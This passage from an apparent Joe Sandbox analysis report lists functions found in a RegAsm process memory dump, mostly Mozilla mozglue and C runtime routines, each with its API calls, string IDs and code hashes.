                                                        • LoadLibraryW.KERNEL32(kernel32.dll,6C0D0DF8), ref: 6C0D0E82
                                                        • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C0D0EA1
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D0EB5
                                                        • FreeLibrary.KERNEL32 ref: 6C0D0EC5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                        • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                        • API String ID: 391052410-1680159014
                                                        • Opcode ID: 78fc6039055934e4dd444415c26c8d0eca37274d8c9f4b3a956b6885f9c248fa
                                                        • Instruction ID: 53663ea2ac25c121890368495039900b6865c24778e48265adf9f3923a594797
                                                        • Opcode Fuzzy Hash: 78fc6039055934e4dd444415c26c8d0eca37274d8c9f4b3a956b6885f9c248fa
                                                        • Instruction Fuzzy Hash: D40146747043C28BEF00AFE9C81CB4A73F6E74631EF11A925E92992F40D73DB445AA11
                                                        Function 6C1005F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C0FCFAE,?,?,?,6C0C31A7), ref: 6C1005FB
                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C0FCFAE,?,?,?,6C0C31A7), ref: 6C100616
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C0C31A7), ref: 6C10061C
                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C0C31A7), ref: 6C100627
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: _writestrlen
                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                        • API String ID: 2723441310-2186867486
                                                        • Opcode ID: 85666fc18045c799ef00c2c4c254f3cab7bada732f7962af0c00e751aed17fa3
                                                        • Instruction ID: 61e7faf268a4d71a59948a5a7242c805702cae4a0488b43ca6557560d8adb0ff
                                                        • Opcode Fuzzy Hash: 85666fc18045c799ef00c2c4c254f3cab7bada732f7962af0c00e751aed17fa3
                                                        • Instruction Fuzzy Hash: 35E08CE2A0202037F6142256AC86EBB761CDBC6538F084139FD0D86301E94AAD1A51F6
                                                        Function 6C119240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C119BAE
                                                        • free.MOZGLUE(?,?), ref: 6C119BC3
                                                        • free.MOZGLUE(?,?), ref: 6C119BD9
                                                          • Part of subcall function 6C1193B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C1194C8
                                                          • Part of subcall function 6C1193B0: free.MOZGLUE(6C119281,?), ref: 6C1194DD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                        • String ID:
                                                        • API String ID: 956590011-0
                                                        • Opcode ID: ef9552fb0f204fb26665068606a66f21f8cb0283de1cab8ecfcaf476614b0c71
                                                        • Instruction ID: 6341cecb0c8fae8728374573bd274ecc23e4113e7de1664c5a04e771036f0306
                                                        • Opcode Fuzzy Hash: ef9552fb0f204fb26665068606a66f21f8cb0283de1cab8ecfcaf476614b0c71
                                                        • Instruction Fuzzy Hash: B4B1B171A087458BCB05CF58C49069FF3F5BFD8328F148629E8699BB40EB34E946CB91
                                                        Function 6C0D05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f00c1913b770eabffb436baa31c174814bdb05d1fba28dc9ad19847dda0f143
                                                        • Instruction ID: 30173a19d54d8dca3a1f1187010ae205947c789854fa35408b5dc23869cf3540
                                                        • Opcode Fuzzy Hash: 9f00c1913b770eabffb436baa31c174814bdb05d1fba28dc9ad19847dda0f143
                                                        • Instruction Fuzzy Hash: 4DA13874A047058FDB14CF29C594B9AFBF1BF48308F55866AD49A9BB00E730BA95CF90
                                                        Function 6C1071A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C106060: moz_xmalloc.MOZGLUE(00000024,16F133E8,00000000,?,00000000,?,?,6C105FCB,6C1079A3), ref: 6C106078
                                                        • free.MOZGLUE(-00000001), ref: 6C1072F6
                                                        • free.MOZGLUE(?), ref: 6C107311
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$moz_xmalloc
                                                        • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                        • API String ID: 3009372454-760240034
                                                        • Opcode ID: ebe0b1e038758ba4455b5e154c40e2b63622486845a688e21fa7412465fd8c69
                                                        • Instruction ID: 9881a62ae3ecde13081e28cc58b8aa5a2d7edf94acde171afb9434f6a9fde1a4
                                                        • Opcode Fuzzy Hash: ebe0b1e038758ba4455b5e154c40e2b63622486845a688e21fa7412465fd8c69
                                                        • Instruction Fuzzy Hash: 43718475F002198FDB14CE69D89079DB7F2AF98308F25C12ED80AAB750DB35A946CBC0
                                                        Function 6C1214A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C1214C5
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C1214E2
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C121546
                                                        • InitializeConditionVariable.KERNEL32(?), ref: 6C1215BA
                                                        • free.MOZGLUE(?), ref: 6C1216B4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                        • String ID:
                                                        • API String ID: 1909280232-0
                                                        • Opcode ID: ea257b7b521b697930ace56843c985f609a0e7bf3cef21b5fa8aec0e29fb6c14
                                                        • Instruction ID: 2246e62abcacafabaee2659ea8e444b00e702f8b48e3d4d1051918e863274032
                                                        • Opcode Fuzzy Hash: ea257b7b521b697930ace56843c985f609a0e7bf3cef21b5fa8aec0e29fb6c14
                                                        • Instruction Fuzzy Hash: CA61EF75A007409BDB21DF20C880BDEB7B1BF8A308F44851CED8A57701EB39E999CB91
                                                        Function 6C11C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C11C1F1
                                                        • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C11C293
                                                        • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C11C29E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: fgetc$memcpy
                                                        • String ID:
                                                        • API String ID: 1522623862-0
                                                        • Opcode ID: cc35c6001412d41eae01677bff033375d2e4f8d11bb64fb884b3852e94091b7e
                                                        • Instruction ID: fdf93a4b23dacd1f7f5b6916021e4d468866504fb81275c2fce91414a42d907c
                                                        • Opcode Fuzzy Hash: cc35c6001412d41eae01677bff033375d2e4f8d11bb64fb884b3852e94091b7e
                                                        • Instruction Fuzzy Hash: F161BF71A08614CFCB14DFA8D8A05AEBBB5FF4A324F154539E802A7B50C735A944CFA0
                                                        Function 6C119F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C119FDB
                                                        • free.MOZGLUE(?,?), ref: 6C119FF0
                                                        • free.MOZGLUE(?,?), ref: 6C11A006
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C11A0BE
                                                        • free.MOZGLUE(?,?), ref: 6C11A0D5
                                                        • free.MOZGLUE(?,?), ref: 6C11A0EB
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                        • String ID:
                                                        • API String ID: 956590011-0
                                                        • Opcode ID: 713ff901a008f7ea6bd8b15376e0cb12f7e27b113927d9542496245482f599dc
                                                        • Instruction ID: 3c4a2af5fbfab725ccd353afea1bcdaa5e8c883cff08206efb2fc7b518f3c415
                                                        • Opcode Fuzzy Hash: 713ff901a008f7ea6bd8b15376e0cb12f7e27b113927d9542496245482f599dc
                                                        • Instruction Fuzzy Hash: C16191755087419FC711CF18C48066AB7F5FFD8328F548669E8999BB02E731E98ACBC1
                                                        Function 6C11DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11DC60
                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C11D38A,?), ref: 6C11DC6F
                                                        • free.MOZGLUE(?,?,?,?,?,6C11D38A,?), ref: 6C11DCC1
                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C11D38A,?), ref: 6C11DCE9
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C11D38A,?), ref: 6C11DD05
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C11D38A,?), ref: 6C11DD4A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                        • String ID:
                                                        • API String ID: 1842996449-0
                                                        • Opcode ID: ead25739390aa5b00b0e043daa5042e6d8d25a6fa23e8f695a7489eaa94aea1a
                                                        • Instruction ID: a8bf60c19ea01d8e97016bdaed270fb8aee2b09b195a64ae001d4cae8ea40335
                                                        • Opcode Fuzzy Hash: ead25739390aa5b00b0e043daa5042e6d8d25a6fa23e8f695a7489eaa94aea1a
                                                        • Instruction Fuzzy Hash: 5D416BB9A04605DFCB01DFA9C880A9AB7F5FF8D318B554569D945ABB10DB35FC00CB90
                                                        Function 6C106590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0FFA80: GetCurrentThreadId.KERNEL32 ref: 6C0FFA8D
                                                          • Part of subcall function 6C0FFA80: AcquireSRWLockExclusive.KERNEL32(6C14F448), ref: 6C0FFA99
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C106727
                                                        • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C1067C8
                                                          • Part of subcall function 6C114290: memcpy.VCRUNTIME140(?,?,6C122003,6C120AD9,?,6C120AD9,00000000,?,6C120AD9,?,00000004,?,6C121A62,?,6C122003,?), ref: 6C1142C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                        • String ID: data
                                                        • API String ID: 511789754-2918445923
                                                        • Opcode ID: b3df3889276e060bcca31e0a084b950d0c5907099b89f963dcfd1bb76c5d5b34
                                                        • Instruction ID: 05196824dfebfabc2c5a07cebfb6ed132a67f6f1a2b3b6ed24b2603c01aaa46b
                                                        • Opcode Fuzzy Hash: b3df3889276e060bcca31e0a084b950d0c5907099b89f963dcfd1bb76c5d5b34
                                                        • Instruction Fuzzy Hash: 51D1D075B083448FD724DF24C851B9FB7E5AFD5308F10892DE58997B51EB30A889CB92
                                                        Function 6C10CA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000001), ref: 6C10CA57
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C10CA69
                                                        • Sleep.KERNEL32 ref: 6C10CADD
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C10CAEA
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C10CAF5
                                                        • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C10CB19
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
                                                        • String ID:
                                                        • API String ID: 432163150-0
                                                        • Opcode ID: b67f4331db143fd62ac333b6d5316abcbc1b40b5de02d9ca644ffaecafd265d8
                                                        • Instruction ID: 52c7fa3b117c2d63dee929541cb23d64ec31029e4296eab787c2ba46742fbd34
                                                        • Opcode Fuzzy Hash: b67f4331db143fd62ac333b6d5316abcbc1b40b5de02d9ca644ffaecafd265d8
                                                        • Instruction Fuzzy Hash: 85212871B046088BC304FB3898511AFF7B9FFC5349F408628E859A7680FF7095598B92
                                                        Function 6C11C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C11C82D
                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C11C842
                                                          • Part of subcall function 6C11CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C13B5EB,00000000), ref: 6C11CB12
                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C11C863
                                                        • std::_Facet_Register.LIBCPMT ref: 6C11C875
                                                          • Part of subcall function 6C0FB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C13B636,?), ref: 6C0FB143
                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C11C89A
                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C11C8BC
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                        • String ID:
                                                        • API String ID: 2745304114-0
                                                        • Opcode ID: 9481949b42282b5e24a8cb874631ad860797a07e44b373fea0f3776f29188aec
                                                        • Instruction ID: c7a2d8ffa1a61611395fa7dcf01cb7f00b59c6f5d28c871cebfe27b7228eb1b3
                                                        • Opcode Fuzzy Hash: 9481949b42282b5e24a8cb874631ad860797a07e44b373fea0f3776f29188aec
                                                        • Instruction Fuzzy Hash: 2111B671B042099FCB00FFA4D8D49AF7BB4EF8935CB004179E91697741EB349905DB91
                                                        Function 6C0FD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C0CEB57,?,?,?,?,?,?,?,?,?), ref: 6C0FD652
                                                        • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C0CEB57,?), ref: 6C0FD660
                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C0CEB57,?), ref: 6C0FD673
                                                        • free.MOZGLUE(?), ref: 6C0FD888
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$memsetmoz_xmalloc
                                                        • String ID: |Enabled
                                                        • API String ID: 4142949111-2633303760
                                                        • Opcode ID: 7a28f00e8ef03ad5c247fb04bfc7df6226adda9a3c75102dd1126d34ff61edd3
                                                        • Instruction ID: 8b77629a6ab5308544cd33088bc1253abfc40a1183fdce287359b69a67a81baf
                                                        • Opcode Fuzzy Hash: 7a28f00e8ef03ad5c247fb04bfc7df6226adda9a3c75102dd1126d34ff61edd3
                                                        • Instruction Fuzzy Hash: 16A1F7B0A043588FDB11CF69C4907EEBBF1AF49318F14805DDCA96B741D735A986CBA1
                                                        Function 6C110180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • free.MOZGLUE(?), ref: 6C110270
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C1102E9
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C1102F6
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C11033A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                        • String ID: about:blank
                                                        • API String ID: 2047719359-258612819
                                                        • Opcode ID: 4daef79122cdded92ec4035fca1ce7c97ea1036ed2ce2609561bc3b562b3c0df
                                                        • Instruction ID: bda164cc0ce5cf051d8b128a0cd09a55cc08a9639be1efe9895bfa0fdac21627
                                                        • Opcode Fuzzy Hash: 4daef79122cdded92ec4035fca1ce7c97ea1036ed2ce2609561bc3b562b3c0df
                                                        • Instruction Fuzzy Hash: 1151AF75E042198FCB00EF58C480A9EB7F1FF89328F258569D82AA7B40D735F956CB90
                                                        Function 6C10E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10E12F
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C10E084,00000000), ref: 6C10E137
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                        • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C10E196
                                                        • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C10E1E9
                                                          • Part of subcall function 6C1099A0: GetCurrentThreadId.KERNEL32 ref: 6C1099C1
                                                          • Part of subcall function 6C1099A0: AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C1099CE
                                                          • Part of subcall function 6C1099A0: ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C1099F8
                                                        Strings
                                                        • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6C10E13F
                                                        Memory Dump Source
